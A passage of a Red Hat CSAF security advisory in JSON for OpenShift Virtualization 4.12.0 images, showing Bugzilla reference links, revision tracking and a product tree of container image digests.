"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2128997"
},
{
"category": "external",
"summary": "2129013",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2129013"
},
{
"category": "external",
"summary": "2129234",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2129234"
},
{
"category": "external",
"summary": "2129301",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2129301"
},
{
"category": "external",
"summary": "2129870",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2129870"
},
{
"category": "external",
"summary": "2130509",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2130509"
},
{
"category": "external",
"summary": "2130588",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2130588"
},
{
"category": "external",
"summary": "2130695",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2130695"
},
{
"category": "external",
"summary": "2130909",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2130909"
},
{
"category": "external",
"summary": "2131157",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2131157"
},
{
"category": "external",
"summary": "2131165",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2131165"
},
{
"category": "external",
"summary": "2131674",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2131674"
},
{
"category": "external",
"summary": "2132031",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132031"
},
{
"category": "external",
"summary": "2132682",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132682"
},
{
"category": "external",
"summary": "2132721",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132721"
},
{
"category": "external",
"summary": "2132744",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132744"
},
{
"category": "external",
"summary": "2132746",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132746"
},
{
"category": "external",
"summary": "2132783",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132783"
},
{
"category": "external",
"summary": "2132793",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132793"
},
{
"category": "external",
"summary": "2132932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2132932"
},
{
"category": "external",
"summary": "2133540",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133540"
},
{
"category": "external",
"summary": "2133541",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133541"
},
{
"category": "external",
"summary": "2133542",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133542"
},
{
"category": "external",
"summary": "2133543",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133543"
},
{
"category": "external",
"summary": "2133655",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133655"
},
{
"category": "external",
"summary": "2133656",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133656"
},
{
"category": "external",
"summary": "2133659",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133659"
},
{
"category": "external",
"summary": "2133660",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133660"
},
{
"category": "external",
"summary": "2134123",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2134123"
},
{
"category": "external",
"summary": "2134672",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2134672"
},
{
"category": "external",
"summary": "2134825",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2134825"
},
{
"category": "external",
"summary": "2135805",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2135805"
},
{
"category": "external",
"summary": "2136051",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2136051"
},
{
"category": "external",
"summary": "2136425",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2136425"
},
{
"category": "external",
"summary": "2136534",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2136534"
},
{
"category": "external",
"summary": "2137123",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137123"
},
{
"category": "external",
"summary": "2137241",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137241"
},
{
"category": "external",
"summary": "2137243",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137243"
},
{
"category": "external",
"summary": "2137349",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137349"
},
{
"category": "external",
"summary": "2137591",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137591"
},
{
"category": "external",
"summary": "2137731",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137731"
},
{
"category": "external",
"summary": "2137733",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137733"
},
{
"category": "external",
"summary": "2137736",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137736"
},
{
"category": "external",
"summary": "2137896",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2137896"
},
{
"category": "external",
"summary": "2138112",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138112"
},
{
"category": "external",
"summary": "2138119",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138119"
},
{
"category": "external",
"summary": "2138199",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138199"
},
{
"category": "external",
"summary": "2138653",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138653"
},
{
"category": "external",
"summary": "2138657",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138657"
},
{
"category": "external",
"summary": "2138664",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2138664"
},
{
"category": "external",
"summary": "2139257",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139257"
},
{
"category": "external",
"summary": "2139260",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139260"
},
{
"category": "external",
"summary": "2139293",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139293"
},
{
"category": "external",
"summary": "2139296",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139296"
},
{
"category": "external",
"summary": "2139299",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139299"
},
{
"category": "external",
"summary": "2139306",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139306"
},
{
"category": "external",
"summary": "2139479",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139479"
},
{
"category": "external",
"summary": "2139574",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139574"
},
{
"category": "external",
"summary": "2139651",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139651"
},
{
"category": "external",
"summary": "2139687",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139687"
},
{
"category": "external",
"summary": "2139738",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139738"
},
{
"category": "external",
"summary": "2139820",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2139820"
},
{
"category": "external",
"summary": "2140117",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140117"
},
{
"category": "external",
"summary": "2140521",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140521"
},
{
"category": "external",
"summary": "2140534",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140534"
},
{
"category": "external",
"summary": "2140627",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140627"
},
{
"category": "external",
"summary": "2140730",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140730"
},
{
"category": "external",
"summary": "2140808",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140808"
},
{
"category": "external",
"summary": "2140977",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140977"
},
{
"category": "external",
"summary": "2140982",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140982"
},
{
"category": "external",
"summary": "2140998",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2140998"
},
{
"category": "external",
"summary": "2141089",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141089"
},
{
"category": "external",
"summary": "2141302",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141302"
},
{
"category": "external",
"summary": "2141399",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141399"
},
{
"category": "external",
"summary": "2141494",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141494"
},
{
"category": "external",
"summary": "2141654",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141654"
},
{
"category": "external",
"summary": "2141711",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2141711"
},
{
"category": "external",
"summary": "2142468",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142468"
},
{
"category": "external",
"summary": "2142470",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142470"
},
{
"category": "external",
"summary": "2142511",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142511"
},
{
"category": "external",
"summary": "2142647",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142647"
},
{
"category": "external",
"summary": "2142891",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142891"
},
{
"category": "external",
"summary": "2142929",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2142929"
},
{
"category": "external",
"summary": "2143268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2143268"
},
{
"category": "external",
"summary": "2143498",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2143498"
},
{
"category": "external",
"summary": "2143964",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2143964"
},
{
"category": "external",
"summary": "2144580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144580"
},
{
"category": "external",
"summary": "2144828",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144828"
},
{
"category": "external",
"summary": "2144839",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2144839"
},
{
"category": "external",
"summary": "2153849",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2153849"
},
{
"category": "external",
"summary": "2155757",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2155757"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2023/rhsa-2023_0408.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Virtualization 4.12.0 Images security update",
"tracking": {
"current_release_date": "2024-11-25T13:35:28+00:00",
"generator": {
"date": "2024-11-25T13:35:28+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.1"
}
},
"id": "RHSA-2023:0408",
"initial_release_date": "2023-01-25T11:11:29+00:00",
"revision_history": [
{
"date": "2023-01-25T11:11:29+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2023-01-25T11:11:29+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-11-25T13:35:28+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "CNV 4.12 for RHEL 8",
"product": {
"name": "CNV 4.12 for RHEL 8",
"product_id": "8Base-CNV-4.12",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:container_native_virtualization:4.12::el8"
}
}
}
],
"category": "product_family",
"name": "OpenShift Virtualization"
},
{
"branches": [
{
"category": "product_version",
"name": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"product": {
"name": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"product_id": "container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/bridge-marker\u0026tag=v4.12.0-24"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"product": {
"name": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"product_id": "container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cluster-network-addons-operator\u0026tag=v4.12.0-24"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"product": {
"name": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"product_id": "container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-containernetworking-plugins\u0026tag=v4.12.0-24"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"product": {
"name": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"product_id": "container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/cnv-must-gather-rhel8\u0026tag=v4.12.0-58"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"product": {
"name": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"product_id": "container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hco-bundle-registry\u0026tag=v4.12.0-769"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"product": {
"name": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"product_id": "container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-csi-driver\u0026tag=v4.12.0-30"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"product": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"product_id": "container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8\u0026tag=v4.12.0-30"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"product": {
"name": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"product_id": "container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hostpath-provisioner-rhel8-operator\u0026tag=v4.12.0-31"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"product": {
"name": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"product_id": "container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-operator\u0026tag=v4.12.0-96"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"product": {
"name": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"product_id": "container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64",
"product_identification_helper": {
"purl": "pkg:oci/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/hyperconverged-cluster-webhook-rhel8\u0026tag=v4.12.0-96"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"product": {
"name": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"product_id": "container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubemacpool\u0026tag=v4.12.0-24"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"product_id": "container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-console-plugin\u0026tag=v4.12.0-182"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"product_id": "container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-ssp-operator\u0026tag=v4.12.0-64"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm\u0026tag=v4.12.0-55"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-copy-template\u0026tag=v4.12.0-55"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-datavolume\u0026tag=v4.12.0-55"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template\u0026tag=v4.12.0-55"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize\u0026tag=v4.12.0-55"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep\u0026tag=v4.12.0-55"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template\u0026tag=v4.12.0-55"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-operator\u0026tag=v4.12.0-40"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"product": {
"name": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"product_id": "container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418?arch=amd64\u0026repository_url=registry.redhat.io/container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status\u0026tag=v4.12.0-55"
}
}
},
{
"category": "product_version",
"name": "container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64",
"product": {
